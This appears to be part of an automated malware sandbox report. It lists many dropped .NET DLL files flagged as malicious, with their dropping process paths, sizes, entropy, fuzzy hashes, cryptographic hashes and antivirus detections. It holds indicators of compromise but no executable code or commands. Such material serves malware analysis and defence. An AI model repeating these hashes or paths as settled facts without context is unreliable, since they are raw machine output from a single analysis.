                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):70144
                                                          Entropy (8bit):5.909536568846014
                                                          Encrypted:false
                                                          SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                          MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                          SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                          SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                          SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24064
                                                          Entropy (8bit):5.4346552043530165
                                                          Encrypted:false
                                                          SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                          MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                          SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                          SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                          SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50176
                                                          Entropy (8bit):5.723168999026349
                                                          Encrypted:false
                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38400
                                                          Entropy (8bit):5.699005826018714
                                                          Encrypted:false
                                                          SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                          MD5:87765D141228784AE91334BAE25AD743
                                                          SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                          SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                          SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.660491370279985
                                                          Encrypted:false
                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                          MD5:240E98D38E0B679F055470167D247022
                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):5.870612048031897
                                                          Encrypted:false
                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):126976
                                                          Entropy (8bit):6.057993947082715
                                                          Encrypted:false
                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):22016
                                                          Entropy (8bit):5.41854385721431
                                                          Encrypted:false
                                                          SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                          MD5:BBDE7073BAAC996447F749992D65FFBA
                                                          SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                          SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                          SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34304
                                                          Entropy (8bit):5.618776214605176
                                                          Encrypted:false
                                                          SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                          MD5:9B25959D6CD6097C0EF36D2496876249
                                                          SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                          SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                          SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.629584586954759
                                                          Encrypted:false
                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):294912
                                                          Entropy (8bit):6.010605469502259
                                                          Encrypted:false
                                                          SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                          MD5:00574FB20124EAFD40DC945EC86CA59C
                                                          SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                          SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                          SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):5.870612048031897
                                                          Encrypted:false
                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.629584586954759
                                                          Encrypted:false
                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):40448
                                                          Entropy (8bit):5.7028690200758465
                                                          Encrypted:false
                                                          SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                          MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                          SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                          SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                          SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):39936
                                                          Entropy (8bit):5.660491370279985
                                                          Encrypted:false
                                                          SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                          MD5:240E98D38E0B679F055470167D247022
                                                          SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                          SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                          SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):50176
                                                          Entropy (8bit):5.723168999026349
                                                          Encrypted:false
                                                          SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                          MD5:2E116FC64103D0F0CF47890FD571561E
                                                          SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                          SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                          SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):28160
                                                          Entropy (8bit):5.570953308352568
                                                          Encrypted:false
                                                          SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                          MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                          SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                          SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                          SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41472
                                                          Entropy (8bit):5.6808219961645605
                                                          Encrypted:false
                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):38912
                                                          Entropy (8bit):5.679286635687991
                                                          Encrypted:false
                                                          SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                          MD5:9E910782CA3E88B3F87826609A21A54E
                                                          SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                          SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                          SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):126976
                                                          Entropy (8bit):6.057993947082715
                                                          Encrypted:false
                                                          SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                          MD5:16B480082780CC1D8C23FB05468F64E7
                                                          SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                          SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                          SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):24576
                                                          Entropy (8bit):5.535426842040921
                                                          Encrypted:false
                                                          SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                          MD5:5420053AF2D273C456FB46C2CDD68F64
                                                          SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                          SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                          SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64000
                                                          Entropy (8bit):5.857602289000348
                                                          Encrypted:false
                                                          SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                          MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                          SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                          SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                          SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33280
                                                          Entropy (8bit):5.634433516692816
                                                          Encrypted:false
                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):34816
                                                          Entropy (8bit):5.636032516496583
                                                          Encrypted:false
                                                          SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                          MD5:996BD447A16F0A20F238A611484AFE86
                                                          SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                          SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                          Malicious:true
                                                          Process:C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):28160
                                                          Entropy (8bit):5.570953308352568
                                                          Encrypted:false
                                                          SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                          MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                          SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                          SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                          SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                          Malicious:true
                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):23552
                                                          Entropy (8bit):5.529329139831718
                                                          Encrypted:false
                                                          SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
